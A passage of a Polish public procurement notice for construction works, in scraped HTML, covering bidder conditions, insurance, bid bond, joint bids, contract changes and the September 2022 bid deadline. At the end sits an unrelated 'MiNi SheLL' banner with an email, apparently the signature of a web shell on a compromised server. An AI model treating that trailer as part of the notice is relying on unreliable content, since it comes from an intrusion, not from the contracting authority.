Obszaru Gospodarczego<br/>oraz Konfederacji Szwajcarskiej, z zastrzeżeniem art. 12a oraz innych przepisów ustawy Prawo<br/>budowlane, a także ustawy z dnia 22 grudnia 2015 r. o zasadach uznawania kwalifikacji zawodowych<br/>nabytych w państwach członkowskich Unii Europejskiej (Dz. U. z 2018 r. poz. 2272).<br/>4) Spełniają warunki udziału w postępowaniu dotyczące sytuacji ekonomicznej lub finansowej: Zamawiający<br/>uzna, że Wykonawca spełnia warunek udziału w ww. zakresie, jeżeli Wykonawca wykaże, że posiada<br/>dokument potwierdzający, że jest on jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną na nie<br/>mniej niż 300.000,00 złotych (słownie: trzysta tysięcy złotych).- obejmującą pełny zakres robót<br/>składających się na wykonanie zamówienia. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">a) wykaz robót budowlanych wykonanych, a w przypadku świadczeń okresowych lub ciągłych również<br/>wykonywanych, w okresie ostatnich 5 lat przed upływem terminu składania ofert, a jeżeli okres<br/>prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat<br/>wykonania i podmiotów, na rzecz których roboty zostały wykonane, oraz załączeniem dowodów, czy<br/>zostały wykonane lub są wykonywane należycie; przy czym dowodami, o których mowa, są referencje<br/>bądź inne dokumenty wystawione przez podmiot, na rzecz którego roboty były wykonywane, a w<br/>przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o<br/>obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów - oświadczenie<br/>wykonawcy; w przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne<br/>dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące<br/>przed upływem terminu składania ofert – zgodnie z Załącznikiem nr 5 do SWZ;<br/>b) oświadczenie na temat wykształcenia i kwalifikacji zawodowych wskazanego w ofercie kierownika<br/>budowy – zgodnie z Załącznikiem nr 5 do SWZ;<br/>c) polisa OC potwierdzająca, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie<br/>prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną na nie<br/>mniej niż 300.000,00 złotych (słownie: trzysta tysięcy złotych) - obejmującą pełny zakres robót<br/>składających się na wykonanie zamówienia.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Dokument określający zasady reprezentacji oraz osobę uprawnioną do reprezentacji<br/>Wykonawcy (jeżeli nie wynikają one z innych dokumentów załączonych przez Wykonawcę do oferty),<br/>a jeżeli Wykonawcę reprezentuje pełnomocnik, dodatkowo także pełnomocnictwo (oryginał lub<br/>kopia potwierdzona notarialnie) określające zakres umocowania podpisane przez osoby<br/>uprawnione do reprezentowania Wykonawcy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1000 <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1) Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku wykonawcy<br/>ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do<br/>reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego.<br/>2) Jeżeli zostanie wybrana oferta wykonawców wspólnie ubiegających się o udzielenie zamówienia,<br/>Zamawiający będzie żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy<br/>regulującej współpracę tych wykonawców.<br/>3) W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) brak podstaw wykluczenia musi spełniać każdy Wykonawca z osobna;<br/>b) warunki udziału w postępowaniu dotyczące kompetencji lub uprawnienia do prowadzenia<br/>określonej działalności zawodowej, o ile wynika to z odrębnych przepisów -musi spełniać każdy Wykonawca z osobna;<br/>c) warunki udziału w postępowaniu dotyczące zdolności technicznej lub zawodowej musi spełniać co najmniej jeden Wykonawca;<br/>d) warunki udziału w postępowaniu dotyczące sytuacji ekonomicznej lub finansowej musi spełniać co najmniej jeden Wykonawca. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość wprowadzenia zmian do zawartej umowy w sprawie zamówienia publicznego, w<br/>warunkach i na podstawie art. 455 ust. 1-2 Ustawy Pzp oraz w sposób i na warunkach określonych w PPU. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-09-29 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">przy użyciu środków komunikacji elektronicznej za pośrednictwem Platformy Zakupowej e-Zamawiający – dostępnej na stronie internetowej prowadzonego postępowania pod adresem: https://cdr-brwinow.ezamawiajacy.pl - w formie elektronicznej lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym na Platformie w zakładce „OFERTY”</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-09-29 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2022-10-28</span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com